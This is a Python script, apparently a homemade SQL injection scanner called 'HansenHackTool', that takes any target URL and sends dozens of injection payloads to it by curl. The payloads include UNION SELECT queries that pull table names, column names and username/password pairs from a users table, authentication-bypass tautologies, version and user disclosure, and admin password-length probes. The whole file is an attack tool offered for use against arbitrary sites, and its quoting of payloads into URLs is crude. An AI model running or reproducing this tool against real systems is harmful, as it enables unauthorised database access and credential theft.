import subprocess
import shlex
from colorama import Fore, Style

class HansenHackTool:
    def __init__(self):
        self.target_url = input("Enter the target URL: ").strip()
        self.payloads = [
            "' OR '1'='1", "' OR '1'='1'--", "' OR '1'='1'/*", "' OR 1=1--", "' OR 1=1#", "' OR 1=1/*", "' OR 'a'='a", "' OR 'a'='a'--",
            "' OR 1=1--+", "' OR 1=1/*", "' OR ''='", "' OR '1'='1'--", "' UNION SELECT NULL, NULL, NULL--",
            "' UNION SELECT NULL, table_name, NULL FROM information_schema.tables--",
            "' UNION SELECT NULL, column_name, NULL FROM information_schema.columns WHERE table_name = 'users'--",
            "' UNION ALL SELECT NULL, username, password FROM users--",
            "' UNION ALL SELECT NULL, NULL, GROUP_CONCAT(table_name) FROM information_schema.tables--",
            "' UNION ALL SELECT NULL, NULL, GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='users'--",
            "' UNION SELECT NULL, NULL, CONCAT('Database: ', DATABASE())--",
            "' UNION SELECT NULL, NULL, CONCAT('Current User: ', USER())--",
            "' UNION SELECT NULL, NULL, CONCAT('Current Database: ', DATABASE())--",
            "' UNION SELECT NULL, NULL, CONCAT('Version: ', @@version)--",
            "' UNION SELECT NULL, NULL, CONCAT('User Host: ', USER())--",
            "' UNION SELECT NULL, NULL, CONCAT('Table Count: ', (SELECT COUNT(*) FROM information_schema.tables))--",
            "' AND 1=CONVERT(int, (SELECT @@version))--",
            "' AND 1=2 UNION SELECT NULL, @@version--",
            "' AND 1=CAST((SELECT @@version) AS INT)--",
            "' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE 0 END)--",
            "' AND (SELECT 1 FROM DUAL WHERE 1=1)--",
            "' AND (SELECT IF(1=1, 1, 0))--",
            "' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE 0 END)--",
            "' AND (SELECT CASE WHEN (1=2) THEN 1 ELSE 0 END)--",
            "' AND (SELECT IFNULL((SELECT user()), 'null'))--",
            "' OR 1=1; INSERT INTO logs (message) VALUES ('SQL Injection Detected')--",
            "' OR EXISTS (SELECT * FROM users WHERE username = 'admin')--",
            "' OR (SELECT COUNT(*) FROM users WHERE username = 'admin') > 0--",
            "' OR (SELECT LENGTH(password) FROM users WHERE username = 'admin') = 8--",
            "' OR (SELECT 1 FROM users WHERE username = 'admin' AND password = 'password')--",
            "' OR (SELECT CASE WHEN (1=1) THEN 1 ELSE 0 END FROM dual)--",
            "' AND (SELECT COUNT(*) FROM users WHERE username = 'admin') > 0--",
            "' AND (SELECT LENGTH(password) FROM users WHERE username = 'admin') = 8--",
            "' AND (SELECT EXISTS (SELECT * FROM users WHERE username = 'admin'))--",
            "' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE 0 END)--",
            "' AND (SELECT CASE WHEN (1=2) THEN 1 ELSE 0 END)--",
            "' AND (SELECT IFNULL((SELECT user()), 'null'))--",
            "' AND (SELECT IFNULL((SELECT COUNT(*) FROM information_schema.tables), 'null'))--",
            "' AND (SELECT IFNULL((SELECT COUNT(*) FROM information_schema.columns WHERE table_name='users'), 'null'))--"
        ]

    def _print_title(self):
        print(f"{Fore.RED}{Style.BRIGHT}=== HANSEN HACK TOOL ==={Style.RESET_ALL}")

    def _print_message(self, message):
        print(f"{Fore.BLUE}{message}{Style.RESET_ALL}")

    def _print_separator(self):
        print("-" * 50)

    def _run_curl_command(self, payload, scan_type):
        escaped_payload = shlex.quote(payload)
        url_with_payload = f"{self.target_url}?{scan_type}={escaped_payload}"
        command = ["curl", "-s", "-X", "GET", url_with_payload]
        try:
            result = subprocess.run(command, check=True, text=True, capture_output=True)
            return result.stdout
        except subprocess.CalledProcessError as e:
            return f"Error: {e.stderr.strip()}"

    def _run_all_scans(self):
        self._print_title()
        for payload in self.payloads:
            for scan_type in ["file_path", "parameter", "command", "directory", "payload"]:
                output = self._run_curl_command(payload, scan_type)
                self._print_separator()
                self._print_message(f"Scan Type: {scan_type} | Payload: {payload}")
                self._print_message(f"Output:\n{output}")

    def _prompt_user_choice(self):
        self._print_message("Please select an option:")
        self._print_message("1. Run all scans")
        self._print_message("2. Exit")
        return input("Enter your choice: ")

    def run(self):
        self._print_title()
        choice = self._prompt_user_choice()
        if choice == '1':
            self._run_all_scans()
        elif choice == '2':
            self._print_message("Exiting tool.")
        else:
            self._print_message("Invalid choice. Please select a valid option.")
            self.run()

if __name__ == "__main__":
    tool = HansenHackTool()
    tool.run()